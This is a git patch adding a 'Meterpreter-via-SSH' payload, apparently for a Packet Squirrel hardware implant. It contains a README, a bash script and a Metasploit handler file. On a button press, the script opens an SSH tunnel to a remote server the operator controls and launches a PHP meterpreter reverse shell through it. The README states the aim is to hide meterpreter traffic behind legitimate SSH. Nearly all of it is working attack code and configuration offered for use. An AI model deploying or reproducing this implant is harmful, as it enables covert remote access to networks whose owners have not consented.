From 261fb62b1095852f94fce474cf1502d8e1112f4d Mon Sep 17 00:00:00 2001 From: Zappus Date: Tue, 26 Dec 2017 23:53:25 -0500 Subject: [PATCH] added Meterpreter-via-SSH payload (#27) --- .../Meterpreter-via-SSH/README.md | 50 +++++++++++++ .../Meterpreter-via-SSH/payload.sh | 74 +++++++++++++++++++ .../Meterpreter-via-SSH/server.rc | 9 +++ 3 files changed, 133 insertions(+) create mode 100644 payloads/library/remote-access/Meterpreter-via-SSH/README.md create mode 100644 payloads/library/remote-access/Meterpreter-via-SSH/payload.sh create mode 100644 payloads/library/remote-access/Meterpreter-via-SSH/server.rc diff --git a/payloads/library/remote-access/Meterpreter-via-SSH/README.md b/payloads/library/remote-access/Meterpreter-via-SSH/README.md new file mode 100644 index 0000000..f1fd182 --- /dev/null +++ b/payloads/library/remote-access/Meterpreter-via-SSH/README.md @@ -0,0 +1,50 @@ +# Meterpreter-via-SSH + +## Overview +This payload starts Packet Squirrel in NAT mode and awaits for user input. When the button is pressed, the payload connects to a remote SSH server and creates a local port tunnel. It then launches a meterpreter shell over said tunnel. + +The intent is to get a meterpreter shell on a target network in a way that hides meterpreter network traffic behind legitimate SSH activity. + +## Operational Design Considerations +* Payload remains silent on the network until user presses the button. +* Payload stops the SSH connection if meterpreter shell fails. +* Payload always keeps only 1 copy of SSH+meterpreter processes running (even if the button is pressed many times). + +## Getting Started +Copy the payload to Packet Squirrel into desired switch folder, then edit the script to configure your server options: +* SSH_USER - username on remote SSH server +* SSH_HOST - ip/domain of remote SSH server + +In case you choose to change the default meterpreter port, don't forget to change it on the metasploit side as well. +* MSF_PORT - port of meterpreter listener + +### Generate SSH Key on Squirrel +You will likely have to generate an ssh key-pair (use default location and empty password) on your Packet Squirrel: +``` +root@squirrel:~# ssh-keygen +``` +### Allow Squirrel on SSH Server +Then you will need to copy the contents of /root/.ssh/id_rsa.pub from Packet Squirrel to the SSH server authorized file: +``` +user@server:~# mkdir ~/.ssh +user@server:~# echo 'paste id_rsa.pub contents inside this quote' > ~/.ssh/authorized_keys +``` +### Run Metasploit with Resource +``` +msf@server:~# msfconsole -r server.rc +``` + +## LED Definitions +1. Configure NETMODE +* Solid Magenta +2. Connect to SSH Server +* SUCCESS - Blink Amber 5 Times +* FAIL - Blink Red 2 Times +3. Launch meterpreter +* SUCCESS - Blink Cyan 1 Time +* FAIL - Blink Red 1 Time + +## Hardening Recommendations +1. Use an account with limited privileges for SSH access on the server. +2. Use a dedicated account for Packet Squirrel device (audit usage with SSH access logs). +3. Disable PasswordAuthentication in sshd_config on the server. diff --git a/payloads/library/remote-access/Meterpreter-via-SSH/payload.sh b/payloads/library/remote-access/Meterpreter-via-SSH/payload.sh new file mode 100644 index 0000000..aae8991 --- /dev/null +++ b/payloads/library/remote-access/Meterpreter-via-SSH/payload.sh @@ -0,0 +1,74 @@ +#!/bin/bash +# Title: Meterpreter-via-SSH +# Description: Covert meterpreter shell via overt SSH connection +# Author: Zappus +# Version: 1.0 +# Category: Remote-Access +# Net Mode: NAT +# Firmware: 1.2 +# +# LED State Descriptions +# Magenta Solid - Configuring NETMODE +# LED OFF - Waiting for BUTTON +# Red Blink 2 Times - SSH Connection Failed +# Amber Blink 5 Times - SSH Connection Successful +# Red Blink 1 Time - Meterpreter Failed +# Cyan Blink 1 Time - Meterpreter Successful + + +SSH_USER="username" +SSH_HOST="hostname" +MSF_PORT=31337 + +function start() +{ + LED SETUP + NETMODE NAT + sleep 5 + LED OFF + + # Wait until BUTTON is pressed + while true + do + NO_LED=1 BUTTON && { + # close any existing meterpreter and SSH connections + kill `pgrep php` 2> /dev/null + kill `pgrep -x ssh` 2> /dev/null + sleep 2 + + # Establish connection to remote SSH server + ssh -f -N -T -M -L $MSF_PORT:127.0.0.1:$MSF_PORT $SSH_USER@$SSH_HOST + + # Check if SSH connection worked + if [ -z `pgrep -x ssh` ] + then + LED FAIL + sleep 5 + LED OFF + continue + else + LED STAGE1 + sleep 5 + fi + + # Start meterpreter reverse shell + meterpreter-php 127.0.0.1 $MSF_PORT & + sleep 2 + + # Check if meterpreter shell started + if [ -z `pgrep php` ] + then + # Close SSH connection because meterpreter failed + kill `pgrep -x ssh` 2> /dev/null + LED FAIL + else + LED SPECIAL + fi + sleep 1 + LED OFF + } + done +} + +# Start the payload +start & diff --git a/payloads/library/remote-access/Meterpreter-via-SSH/server.rc b/payloads/library/remote-access/Meterpreter-via-SSH/server.rc new file mode 100644 index 0000000..c008aa1 --- /dev/null +++ b/payloads/library/remote-access/Meterpreter-via-SSH/server.rc @@ -0,0 +1,9 @@ +use exploit/multi/handler +set payload php/meterpreter/reverse_tcp +set EnableContextEncoding false +set DisablePayloadHandler false +set ExitOnSession false +set ListenerTimeout 0 +set LHOST 127.0.0.1 +set LPORT 31337 +run -j